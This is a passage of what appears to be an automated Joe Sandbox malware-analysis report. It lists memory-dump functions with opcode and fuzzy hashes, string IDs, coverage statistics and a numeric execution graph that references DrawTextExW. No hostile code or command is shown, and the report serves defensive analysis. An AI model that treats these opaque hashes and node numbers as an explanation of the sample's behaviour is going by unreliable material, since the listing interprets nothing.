                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 98R
                                                • API String ID: 0-576591972
                                                • Opcode ID: 92211fc18590a1f2feec32d07e5fefdacce3dff843b32ac8a906e02717d618cf
                                                • Instruction ID: 2d2bf1d4f34821f276b191102de3a988184caf30c9d3db0fc1a039b5c562a8cf
                                                • Opcode Fuzzy Hash: 92211fc18590a1f2feec32d07e5fefdacce3dff843b32ac8a906e02717d618cf
                                                • Instruction Fuzzy Hash: 7C7116B4E2520A9FCB04CFA9D4859EEFBB1FB89310F24952AD415EB314D3749A81CF94
                                                Function 074B34A0 Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: w7e^
                                                • API String ID: 0-1657886525
                                                • Opcode ID: 3ff0be7df8486438245f9c598317fbd9e29d548504b1ffc8e775febbdc727311
                                                • Instruction ID: 65c4964cd075cf335d8712ac273fbb051975c6c2ac7b3ca166ba49a1cde0b591
                                                • Opcode Fuzzy Hash: 3ff0be7df8486438245f9c598317fbd9e29d548504b1ffc8e775febbdc727311
                                                • Instruction Fuzzy Hash: 305179B1D14259EFCB24CFAAD9812EEBBB1FB89200F15896BC015B7240D3385A46CF65
                                                Function 0726AEF0 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: -2m
                                                • API String ID: 0-2686427999
                                                • Opcode ID: 00a1fae11ddbd7a980e25043420b1b928c7d7563617f199e61a581935cb14ef6
                                                • Instruction ID: 5143a7061c975f8b5eae9886ac6acc6a53aaea06b17441320becd42009c70a8e
                                                • Opcode Fuzzy Hash: 00a1fae11ddbd7a980e25043420b1b928c7d7563617f199e61a581935cb14ef6
                                                • Instruction Fuzzy Hash: EF516DB0E242598FCB08CFA9D4446AEFBF2FF89300F24D16AD419B7255D7744A81CBA5
                                                Function 074B3140 Relevance: 1.4, Strings: 1, Instructions: 150COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: iUfo
                                                • API String ID: 0-3820436262
                                                • Opcode ID: e94373b106e128524740a8ba22755e21a5421f1ce2910ef90ea0852e6da23b2b
                                                • Instruction ID: 44843e585f5f51fd054b5b646412c3edda025fedf8e1e5d7485f10f74e2ab17e
                                                • Opcode Fuzzy Hash: e94373b106e128524740a8ba22755e21a5421f1ce2910ef90ea0852e6da23b2b
                                                • Instruction Fuzzy Hash: F35105B4E112199FCB18CFAAD9455EEBBB2FF89300F14942AE405BB354E7385A41CB64
                                                Function 074B3150 Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: iUfo
                                                • API String ID: 0-3820436262
                                                • Opcode ID: 84d838eff0b41d0363e1bf90c475bb00740f8a9bcbccf0964ca307e5b253818c
                                                • Instruction ID: 43c9d226be48fce6ad2fa470ab497ff4cdace66c8098cd94077b4af4c3257c9e
                                                • Opcode Fuzzy Hash: 84d838eff0b41d0363e1bf90c475bb00740f8a9bcbccf0964ca307e5b253818c
                                                • Instruction Fuzzy Hash: D051F2B4E112199FCB18CFAAD9455EEFBB6FF89300F10942AE405BB354E73859428F64
                                                Function 0726AF30 Relevance: 1.4, Strings: 1, Instructions: 140COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: -2m
                                                • API String ID: 0-2686427999
                                                • Opcode ID: e00937863822cd20c797c3eadcd7942a57652455dd5417cb850e32ae0031f47d
                                                • Instruction ID: 331c9bfa2bae9ceb6041d655e2faba13dc037bad25e90944a2795df765bae961
                                                • Opcode Fuzzy Hash: e00937863822cd20c797c3eadcd7942a57652455dd5417cb850e32ae0031f47d
                                                • Instruction Fuzzy Hash: 2B5139B0E142198FDB08CFAAD4446AEFBF2FF89300F24D16AD419B7254D7748981CB65
                                                Function 074B0006 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0ni
                                                • API String ID: 0-1488673370
                                                • Opcode ID: 37264fd15f244fd923e8abb8d72dff17a6e710a4bc713fc308acc8998623d30b
                                                • Instruction ID: 6309ee73c68178a9d5228e70adaac0c69a21ca69554357622575aa076a122e35
                                                • Opcode Fuzzy Hash: 37264fd15f244fd923e8abb8d72dff17a6e710a4bc713fc308acc8998623d30b
                                                • Instruction Fuzzy Hash: 6951AC71D057588FDB59CF678D4569AFBF3AFC9200F08C1EAC40CAA265DB340A858F51
                                                Function 074B3548 Relevance: 1.4, Strings: 1, Instructions: 123COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: w7e^
                                                • API String ID: 0-1657886525
                                                • Opcode ID: 7edb5fe3ca6d9f804118a2a6baa880fc54a56e05a4fda12e0b3889f2993e97b4
                                                • Instruction ID: 229c331d55d5c76f89e05e520a0f373f5878df7da159991d03de9d068b4f1be9
                                                • Opcode Fuzzy Hash: 7edb5fe3ca6d9f804118a2a6baa880fc54a56e05a4fda12e0b3889f2993e97b4
                                                • Instruction Fuzzy Hash: CD4115B0D14219DBCF14CFAAC8845EEFBB1FB8D201F15992AC416B7254D7385A468F68
                                                Function 074B353A Relevance: 1.4, Strings: 1, Instructions: 123COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: w7e^
                                                • API String ID: 0-1657886525
                                                • Opcode ID: 69670e3d17d83e77e82812855767fc35e328efe42f06dd120af790dc52140850
                                                • Instruction ID: d71314dac4b2410d7396518aae7f5f598202141d7b1d7103dca45db0c356a030
                                                • Opcode Fuzzy Hash: 69670e3d17d83e77e82812855767fc35e328efe42f06dd120af790dc52140850
                                                • Instruction Fuzzy Hash: EB4128B0D14219DFCB14CFAAC8856EEFBB1FB8D201F15992AC015B7254D7385A468F64
                                                Function 074B0040 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0ni
                                                • API String ID: 0-1488673370
                                                • Opcode ID: e08c4da2e9d92b560a56641cf7efcb9bdd491267992bcf38b791e005b48ce2ec
                                                • Instruction ID: e18ef6b3e9e41c58048739c4d43d956a2d9c68d4e9aebe0d8fa0d00db4a8e922
                                                • Opcode Fuzzy Hash: e08c4da2e9d92b560a56641cf7efcb9bdd491267992bcf38b791e005b48ce2ec
                                                • Instruction Fuzzy Hash: 25515BB1E016188BEB68CF6B8D4579EFBF7AFC8300F14C1BA850CA6214DB740A858F11
                                                Function 02E80040 Relevance: .3, Instructions: 315COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2167842860.0000000002E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2e80000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 64b5ea30c3b9e99a0dbed7e8559cef1fb6fa0f5b6063eaabedf7e657bd416aff
                                                • Instruction ID: 44b247db88f942b0debcc7c1aed86a6299f8c2b4af99500a07781bb8ecf552cb
                                                • Opcode Fuzzy Hash: 64b5ea30c3b9e99a0dbed7e8559cef1fb6fa0f5b6063eaabedf7e657bd416aff
                                                • Instruction Fuzzy Hash: CB1283B0D81745AAE710CF65F84C1897BB2B7C1328BD04A09D2612BBE1D7BC196BCF44
                                                Function 074BE6F0 Relevance: .3, Instructions: 312COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1d1fdadcf90c0c13145f00a9cf02c4a276d23126e416acb8c42bdc416a66bcfc
                                                • Instruction ID: 22cdb4cf673b76b81552426de49f5019c1d65c4adb03e4bf210c4fca0f0f1371
                                                • Opcode Fuzzy Hash: 1d1fdadcf90c0c13145f00a9cf02c4a276d23126e416acb8c42bdc416a66bcfc
                                                • Instruction Fuzzy Hash: 86E10DB4E101698FDB14DFA9C580AEEBBB2FF89305F24826AD415A7355D730AD42CF60
                                                Function 074BD500 Relevance: .3, Instructions: 312COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a9c21ecc932c8c6ec3bc6b1f8142f105f5d02586013400b8628c68753ba5e336
                                                • Instruction ID: 195ef95e9a54cc2614699569ec451a5da789e1a0eb7d5714fec173bf2a98dea3
                                                • Opcode Fuzzy Hash: a9c21ecc932c8c6ec3bc6b1f8142f105f5d02586013400b8628c68753ba5e336
                                                • Instruction Fuzzy Hash: C8E1FAB4E102598FDB14DFA9C580AEEBBB2FF49305F24826AD415A7359D730AD42CF60
                                                Function 074BE1E0 Relevance: .3, Instructions: 312COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d15fee1a864e681dc074a486c8a5b2667975f063e455e2ea0a0a4eb52be7bbe6
                                                • Instruction ID: 3e2c6772e903853bc4bbdd36ea06d527295f511bbec70ae1e77d447561728786
                                                • Opcode Fuzzy Hash: d15fee1a864e681dc074a486c8a5b2667975f063e455e2ea0a0a4eb52be7bbe6
                                                • Instruction Fuzzy Hash: 5CE1FCB4E001698FDB14DFA9C584AEEBBB2FF89305F24826AD415A7355D730AD42CF60
                                                Function 054662D8 Relevance: .3, Instructions: 264COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cc2c2d68b094b1d31847005a040a7f33192dfb12c8640ebcc104e9789193d7f5
                                                • Instruction ID: c72753a518f0eefb8b2bcdb46f4ed8f47be4e09e12a103fcda8bdfc289cf62a3
                                                • Opcode Fuzzy Hash: cc2c2d68b094b1d31847005a040a7f33192dfb12c8640ebcc104e9789193d7f5
                                                • Instruction Fuzzy Hash: 98D1E53592066BCADB10EB64D89069DF771FF95300F20D79AE14A7B610EFB06AC5CB90
                                                Function 0140D57C Relevance: .3, Instructions: 264COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2165291226.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1400000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 83b3f0735f08a856e5a0f1f03235e9cd5ed5664f7799c3700b9775c9d6e89262
                                                • Instruction ID: f78ae3bd50c41e8b1425d717b93804f45ee2c0720c206e1717d96ea990d12cc8
                                                • Opcode Fuzzy Hash: 83b3f0735f08a856e5a0f1f03235e9cd5ed5664f7799c3700b9775c9d6e89262
                                                • Instruction Fuzzy Hash: AEA16D32E002068FCF16DFB6C94059EBBB2FF95300B15457AE905AB3A1DB75D91ACB40
                                                Function 054662D7 Relevance: .3, Instructions: 262COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2173885941.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5460000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3298ff97e0a2dbbedd08f17e21875e7ddf8ee34d5b9191e896838e416a010b6c
                                                • Instruction ID: e8709615a47ebbcec6929d97cbbe67c475443cc43e04279c1c774a0f82c48da0
                                                • Opcode Fuzzy Hash: 3298ff97e0a2dbbedd08f17e21875e7ddf8ee34d5b9191e896838e416a010b6c
                                                • Instruction Fuzzy Hash: 0FD1F535D2066BCADB10EB64D89069DF771FF95300F20D79AE10A3B610EBB06AC5CB90
                                                Function 0726DB21 Relevance: .2, Instructions: 237COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e19d2bb71b19e32caf2e1b53e55af69eb367c8d157bd76f033407924db6cf817
                                                • Instruction ID: 926532736473f3144347b743eae5812a13e4a98e287aed13282cd86592217cce
                                                • Opcode Fuzzy Hash: e19d2bb71b19e32caf2e1b53e55af69eb367c8d157bd76f033407924db6cf817
                                                • Instruction Fuzzy Hash: 3FA115B4F2520ACFCB44CFA9D9889AEFBF1FF85210F24956AD415AB214D370AE41CB51
                                                Function 02E80006 Relevance: .2, Instructions: 237COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2167842860.0000000002E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2e80000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 485c1ce333a8068edc76174337dafeb4e8db497b67b5bc33bd71203887991389
                                                • Instruction ID: 6d21923ade2c9b0d27dc61e56d1d52f5c716bde62d867c849af1ce8a42812f89
                                                • Opcode Fuzzy Hash: 485c1ce333a8068edc76174337dafeb4e8db497b67b5bc33bd71203887991389
                                                • Instruction Fuzzy Hash: 05C125B0C81746ABD711CF65F8481897BB2BBC5324B954B09D1612BBE1DBBC186BCF44
                                                Function 0726D838 Relevance: .2, Instructions: 199COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2fd8f909832e66d8fe0caaa4b50a62ee5cf823261795e4d07681b32793211483
                                                • Instruction ID: 30fdb350f289ddc6285892ebbd80fa519a90e0f159e4259bed11e0b6454ae245
                                                • Opcode Fuzzy Hash: 2fd8f909832e66d8fe0caaa4b50a62ee5cf823261795e4d07681b32793211483
                                                • Instruction Fuzzy Hash: 7E81F4B4E25259CFCB44CFA9C98899EFBF1FF89310F14956AD415AB310D370AA42CB51
                                                Function 0726D848 Relevance: .2, Instructions: 196COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ddaf748bd9c783bbe26b6e870fc53fe611e93d9c3b03dcda5dc8323467c7f9e9
                                                • Instruction ID: 4f0cd618449669dc5ecfaa776fe2bf8e46a0c0b0df429fbfd0870a360570ddba
                                                • Opcode Fuzzy Hash: ddaf748bd9c783bbe26b6e870fc53fe611e93d9c3b03dcda5dc8323467c7f9e9
                                                • Instruction Fuzzy Hash: 7891B3B4E25219CFCB44CF99C98899EFBF1FB89210F14955AD415AB324D370AA42CF51
                                                Function 074B38F8 Relevance: .2, Instructions: 190COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 62c389e3b2237e0635058c50a28f425bd0a8eb19f04470876ee2caa2b0bfa824
                                                • Instruction ID: b6d799b6a19d5ba9600d61d10bf84a433c6cd3a5bc0ab07332ca9151fcaadf8e
                                                • Opcode Fuzzy Hash: 62c389e3b2237e0635058c50a28f425bd0a8eb19f04470876ee2caa2b0bfa824
                                                • Instruction Fuzzy Hash: A8811EB4D141698FDB14DFAAC5806AEFBB6FF89301F24826AD418A7215D7309E42CF61
                                                Function 0726EC58 Relevance: .2, Instructions: 173COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 53d5340b98ac464305b7e901213fc4f7f9911365c0a29aca8c337f6dfcadaede
                                                • Instruction ID: 42a5443a9ffc05d099f8da95f403b8097efb9c94df1d8f3c404d6e91809d992a
                                                • Opcode Fuzzy Hash: 53d5340b98ac464305b7e901213fc4f7f9911365c0a29aca8c337f6dfcadaede
                                                • Instruction Fuzzy Hash: 5C71F8B8E25609CFCB04CFA9C5845DEFBF2FF89210F25942AD415BB354D3749A818B68
                                                Function 0726EC49 Relevance: .2, Instructions: 171COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9dac4f856b9fc2160b4c05e7368036cdf0d904ff77fa317b7442e860d1f7ac87
                                                • Instruction ID: 09033f67ce79cab5f552aa07d415e56cbf2f3f7f55022691050b76165c284b3e
                                                • Opcode Fuzzy Hash: 9dac4f856b9fc2160b4c05e7368036cdf0d904ff77fa317b7442e860d1f7ac87
                                                • Instruction Fuzzy Hash: AA711AB4E25609CFCB04CFA9C5845DEFBF2FF89210F25942AD415B7354D3749A818B68
                                                Function 074B2E02 Relevance: .1, Instructions: 109COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b9e471eddf0dd9419ca0a15f2cc5a61401dbd7e748cddaf756e9b74849cdd9d5
                                                • Instruction ID: 02b438228d2ca5bd4b2ce8f0202657d1aa33ccc25cc3c722b1b2ea63e7009b29
                                                • Opcode Fuzzy Hash: b9e471eddf0dd9419ca0a15f2cc5a61401dbd7e748cddaf756e9b74849cdd9d5
                                                • Instruction Fuzzy Hash: DB413BB0E1560ADFCB14CFE6C5416EFFBF2BB99200F24946AC014B7264D3748B418BA4
                                                Function 0726EEE8 Relevance: .1, Instructions: 108COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7767b84eedcfca83b1098741c6907c5240839186cdfd71efe4828db38dcb0b17
                                                • Instruction ID: 3a19da76973abf71c57f9fa351fb47e9de1736560ec951e72e6f4b2b216d7586
                                                • Opcode Fuzzy Hash: 7767b84eedcfca83b1098741c6907c5240839186cdfd71efe4828db38dcb0b17
                                                • Instruction Fuzzy Hash: C84109B4E2521ADBCB44CFA9C5855AEFBF2FF88300F60D56AC405B7314D7749A818BA4
                                                Function 0726EED9 Relevance: .1, Instructions: 107COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 662393916bb5d67b0eea38f6fce23d03f9be132a07c0012f112bc70c32d942aa
                                                • Instruction ID: 03c334b051a54b3054923cce15806c0714d3551c48dbdf9ef801c9dfb501b714
                                                • Opcode Fuzzy Hash: 662393916bb5d67b0eea38f6fce23d03f9be132a07c0012f112bc70c32d942aa
                                                • Instruction Fuzzy Hash: 46412BB4E2521ADFCB04CFA9C5855AEFBF2FF88300F64C56AC404A7254D7749A818BA4
                                                Function 074B2E10 Relevance: .1, Instructions: 106COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2175166126.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_74b0000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d57ef6e02ef80f4b5d45cc116d668292d2bb71950b53bf66f7e282e08c156d82
                                                • Instruction ID: 3677981b028975cb7e1e23f13394ce4c8ef99a9cdd83cb0caa9ed6ec6bb09297
                                                • Opcode Fuzzy Hash: d57ef6e02ef80f4b5d45cc116d668292d2bb71950b53bf66f7e282e08c156d82
                                                • Instruction Fuzzy Hash: C9410DB0E1560ADFCB54CFE6C5416EEFBF1BB99200F10986AC015B7264D3749B428BA4
                                                Function 0726EA40 Relevance: .1, Instructions: 104COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1b3ad17a4b636d16c7f165450f99dab364782cf29a8ac17f410db8e9ec5b0456
                                                • Instruction ID: ef7c0f1e4b6b7535907b7941a8d81933890fdc9d73bcca89f2f3ae2da1f4a0b6
                                                • Opcode Fuzzy Hash: 1b3ad17a4b636d16c7f165450f99dab364782cf29a8ac17f410db8e9ec5b0456
                                                • Instruction Fuzzy Hash: B84139B4E2460ADFCB04CFAAD4855AEFBF2BF89200F14C56AC415A7254D3349A82CF90
                                                Function 0726EA50 Relevance: .1, Instructions: 101COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 744c82f0fa1e09b9626a8672a02012c27e08af825a81ce96e79c09e0541bf6bf
                                                • Instruction ID: 2c085345c295706d0b4b9b028ca6d15ef11c27f7c99b5b5b1cdb56672d364371
                                                • Opcode Fuzzy Hash: 744c82f0fa1e09b9626a8672a02012c27e08af825a81ce96e79c09e0541bf6bf
                                                • Instruction Fuzzy Hash: C44107B4E2420ADFDB04CFAAD5855AEFBF2BF89300F14C52AC415B7214D7749A818F94
                                                Function 07269B20 Relevance: .1, Instructions: 68COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2174845989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7260000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: de7873030230294a1c31f14bce606037d4ecced00146f14dd84c0d71ede4d6fc
                                                • Instruction ID: c5bc5c85931bdad36ac2558dc7e8b03b5a7b96fb40b3bee5db7c40b6280a4564
                                                • Opcode Fuzzy Hash: de7873030230294a1c31f14bce606037d4ecced00146f14dd84c0d71ede4d6fc
                                                • Instruction Fuzzy Hash: AD210EB1E106589BEB18CFAB98446DEFBF3AFC9200F18C17BC418A6254EB3406468F11

                                                Execution Graph

                                                Execution Coverage:11.9%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:279
                                                Total number of Limit Nodes:27
                                                execution_graph 33401 7803000 33402 7803016 33401->33402 33406 7803458 33402->33406 33411 7803468 33402->33411 33403 780308c 33407 7803468 33406->33407 33415 7803498 33407->33415 33420 78034a8 33407->33420 33408 7803486 33408->33403 33413 7803498 DrawTextExW 33411->33413 33414 78034a8 DrawTextExW 33411->33414 33412 7803486 33412->33403 33413->33412 33414->33412 33417 780349d 33415->33417 33416 7803506 33416->33408 33417->33416 33425 7803518 33417->33425 33430 7803528 33417->33430 33421 78034d9 33420->33421 33422 7803506 33421->33422 33423 7803518 DrawTextExW 33421->33423 33424 7803528 DrawTextExW 33421->33424 33422->33408 33423->33422 33424->33422 33427 7803528 33425->33427 33426 780355e 33426->33416 33427->33426 33435 7801f58 33427->33435 33429 78035b9 33432 7803549 33430->33432 33431 780355e 33431->33416 33432->33431 33433 7801f58 DrawTextExW 33432->33433 33434 78035b9 33433->33434 33437 7801f63 33435->33437 33436 7803949 33436->33429 33437->33436 33441 7803f8f 33437->33441 33445 7803fa0 33437->33445 33438 7803a5b 33438->33429 33442 7803f9d 33441->33442 33448 780207c 33442->33448 33446 7803fbd 33445->33446 33447 780207c DrawTextExW 33445->33447 33446->33438 33447->33446 33449 7803fd8 DrawTextExW 33448->33449 33451 7803fbd 33449->33451 33451->33438 33499 780fad0 33500 780faea 33499->33500 33501 780fb0e 33500->33501 33519 eb9053a 33500->33519 33522 eb90958 33500->33522 33526 eb900f9 33500->33526 33533 eb90726 33500->33533 33537 eb90006 33500->33537 33545 eb90040 33500->33545 33553 eb901ee 33500->33553 33561 eb9088f 33500->33561 33565 eb90794 